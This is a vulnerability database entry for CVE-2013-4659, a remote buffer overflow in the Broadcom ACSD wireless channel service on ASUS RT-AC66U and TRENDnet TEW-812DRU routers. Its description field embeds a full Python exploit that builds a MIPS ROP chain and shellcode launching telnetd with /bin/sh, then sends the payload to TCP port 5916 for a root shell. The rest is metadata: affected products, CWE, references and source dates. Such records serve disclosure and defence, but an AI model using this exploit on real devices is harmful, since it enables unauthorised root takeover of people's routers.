ID
VAR-201703-0032
CVE
CVE-2013-4659
TITLE
ASUS RT-AC66U and TRENDnet TEW-812DRU Used by multiple vendor routers including Broadcom ACSD Vulnerable to buffer overflow
Trust: 0.8
DESCRIPTION
Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python import signal, struct from time import sleep from socket import * from sys import exit, exc_info # # Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command # Discovered and Reported*June 2013 # Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson # *Security Analsyts @ Independent Security Evaluators # Software Vendor*********http://asus.com # Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/ # Software****************acsd wireless service (Listens on TCP/5916) # Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) # CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659 # # Overview: # The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple # Buffer Overflow attacks. # # Multiple overflows exist in the following software: # # - Broadcom acsd - Wireless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands) # def sigHandle(signum, frm): # Signal handler print "\n[!!!] Cleaning up the exploit... [!!!]\n" sleep(1) exit(0) def targServer(): while True: try: server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>")) server = inet_ntoa(server) break except: print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n" sleep(1) continue return server def main(): print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command [*] Discovered and Reported: June 2013 [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [*] Software Vendor: http://asus.com [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [*] Software: acsd wireless service (Listens on TCP/5916) [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel¶m=" #Vulnerable command - JH # base address of .text section of libc.so.0 in acsd's address space libc_base = 0x2ab25000 # ROP gadget #1 # lui s0,0x2 # li a0,1 # move t9,s1 # jalr t9 # ori a1,s0,0x2 ra1 = struct.pack("<L", libc_base + 0x2d39c) # ROP gadget #2 # move t9,s3 # lw ra,44(sp) # lw s4,40(sp) # lw s3,36(sp) # lw s2,32(sp) # lw s1,28(sp) # lw s0,24(sp) # jr t9 s1 = struct.pack("<L", libc_base + 0x34358) # sleep() - used to force program context switch (cache flush) s3 = struct.pack("<L", libc_base + 0x2cb90) # ROP gadget #3 # addiu a1,sp,24 # lw gp,16(sp) # lw ra,32(sp) # jr ra # addiu sp,sp,40 ra2 = struct.pack("<L", libc_base + 0xa1b0) # ROP gadget #4 # move t9,a1 # addiu a0,a0,56 # jr t9 # move a1,a2 ra3 = struct.pack("<L", libc_base + 0x3167c) # jalr sp jalr_sp = "\x09\xf8\xa0\x03" JuNk = "\x42" * 510 safeNop = "2Aa3" #80 Bytes system() Shellcode by Jacob Holcomb of ISE #Calling system() and executing telnetd -l /bin/sh shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8" shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff" shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4" shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35" shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac" shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a" shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32" shellcode += "\x41\x61\x33" sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48] sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4] sploit += safeNop + shellcode try: print "\n [*] Creating network socket." net_sock = socket(AF_INET, SOCK_STREAM) except: print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0) try: print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port) net_sock.connect((victim, port)) except: print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] Attempting to exploit the acsd param command. [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0) if __name__ == "__main__": main()
Trust: 2.7
IOT TAXONOMY
| category: | ['Network device'] | sub_category: | - | Trust: 0.6 |
AFFECTED PRODUCTS
| vendor: | asus | model: | rt-ac66u | scope: | eq | version: | - | Trust: 1.6 |
| vendor: | trendnet | model: | tew-812dru | scope: | eq | version: | - | Trust: 1.0 |
| vendor: | asustek computer | model: | rt-ac66u | scope: | - | version: | - | Trust: 0.8 |
| vendor: | trendnet | model: | tew-812dru | scope: | - | version: | - | Trust: 0.8 |
| vendor: | asus | model: | rt-ac66u | scope: | eq | version: | 3.0.0.4.266 | Trust: 0.6 |
CVSS
SEVERITY | CVSSV2 | CVSSV3 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
PROBLEMTYPE DATA
| problemtype: | CWE-119 | Trust: 1.9 |
THREAT TYPE
remote
Trust: 0.7
TYPE
buffer overflow
Trust: 0.6
CONFIGURATIONS
EXPLOIT AVAILABILITY
PATCH
| title: | Top Page | url: | https://www.asus.com/jp/ | Trust: 0.8 |
| title: | Top Page | url: | http://www.trendnet.com/home | Trust: 0.8 |
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-4659 | Trust: 3.6 |
| db: | PACKETSTORM | id: | 122562 | Trust: 2.7 |
| db: | BID | id: | 61499 | Trust: 1.6 |
| db: | JVNDB | id: | JVNDB-2013-006764 | Trust: 0.8 |
| db: | CNNVD | id: | CNNVD-201307-627 | Trust: 0.7 |
| db: | CNVD | id: | CNVD-2013-11043 | Trust: 0.6 |
| db: | NSFOCUS | id: | 24219 | Trust: 0.6 |
| db: | EXPLOIT-DB | id: | 27133 | Trust: 0.2 |
| db: | SEEBUG | id: | SSVID-80751 | Trust: 0.1 |
| db: | SEEBUG | id: | SSVID-80752 | Trust: 0.1 |
| db: | VULHUB | id: | VHN-64661 | Trust: 0.1 |
| db: | VULMON | id: | CVE-2013-4659 | Trust: 0.1 |
REFERENCES
| url: | http://www.linux-magazine.com/issues/2014/161/security-and-soho-routers | Trust: 2.6 |
| url: | https://packetstormsecurity.com/files/122562/asus-rt-ac66u-acsd-remote-root-buffer-overflow.html | Trust: 2.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-4659 | Trust: 0.9 |
| url: | http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4659 | Trust: 0.8 |
| url: | http://1337day.com/exploit/21033 | Trust: 0.6 |
| url: | http://www.securityfocus.com/bid/61499 | Trust: 0.6 |
| url: | http://www.nsfocus.net/vulndb/24219 | Trust: 0.6 |
| url: | https://cwe.mitre.org/data/definitions/119.html | Trust: 0.1 |
| url: | http://tools.cisco.com/security/center/viewalert.x?alertid=33445 | Trust: 0.1 |
| url: | https://www.exploit-db.com/exploits/27133/ | Trust: 0.1 |
| url: | https://nvd.nist.gov | Trust: 0.1 |
| url: | http://asus.com | Trust: 0.1 |
| url: | http://securityevaluators.com, | Trust: 0.1 |
| url: | http://infosec42.blogspot.com/ | Trust: 0.1 |
CREDITS
Jacob Holcomb/Gimppy and Jacob Thompson
Trust: 0.9
SOURCES
| db: | CNVD | id: | CNVD-2013-11043 |
| db: | VULHUB | id: | VHN-64661 |
| db: | VULMON | id: | CVE-2013-4659 |
| db: | BID | id: | 61499 |
| db: | JVNDB | id: | JVNDB-2013-006764 |
| db: | PACKETSTORM | id: | 122562 |
| db: | CNNVD | id: | CNNVD-201307-627 |
| db: | NVD | id: | CVE-2013-4659 |
LAST UPDATE DATE
2024-11-23T22:01:14.484000+00:00
SOURCES UPDATE DATE
| db: | CNVD | id: | CNVD-2013-11043 | date: | 2013-08-01T00:00:00 |
| db: | VULHUB | id: | VHN-64661 | date: | 2017-03-15T00:00:00 |
| db: | VULMON | id: | CVE-2013-4659 | date: | 2017-03-15T00:00:00 |
| db: | BID | id: | 61499 | date: | 2013-07-31T12:25:00 |
| db: | JVNDB | id: | JVNDB-2013-006764 | date: | 2017-04-05T00:00:00 |
| db: | CNNVD | id: | CNNVD-201307-627 | date: | 2017-03-15T00:00:00 |
| db: | NVD | id: | CVE-2013-4659 | date: | 2024-11-21T01:56:00.523 |
SOURCES RELEASE DATE
| db: | CNVD | id: | CNVD-2013-11043 | date: | 2013-08-01T00:00:00 |
| db: | VULHUB | id: | VHN-64661 | date: | 2017-03-14T00:00:00 |
| db: | VULMON | id: | CVE-2013-4659 | date: | 2017-03-14T00:00:00 |
| db: | BID | id: | 61499 | date: | 2013-07-29T00:00:00 |
| db: | JVNDB | id: | JVNDB-2013-006764 | date: | 2017-04-05T00:00:00 |
| db: | PACKETSTORM | id: | 122562 | date: | 2013-07-26T20:22:22 |
| db: | CNNVD | id: | CNNVD-201307-627 | date: | 2013-07-29T00:00:00 |
| db: | NVD | id: | CVE-2013-4659 | date: | 2017-03-14T09:59:00.160 |